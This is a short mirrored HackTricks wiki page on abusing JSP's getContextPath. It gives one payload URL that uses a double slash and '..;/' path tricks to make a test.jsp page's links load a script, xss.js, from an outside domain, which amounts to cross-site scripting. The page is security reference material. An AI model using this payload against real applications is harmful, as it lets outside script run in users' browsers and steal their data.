mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
21 lines
477 B
Markdown
21 lines
477 B
Markdown
# JSP
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## **getContextPath** abuse
|
|
|
|
Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
|
|
|
|
```
|
|
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
|
|
```
|
|
|
|
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
|
|
|
|
.png>)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
|
|
|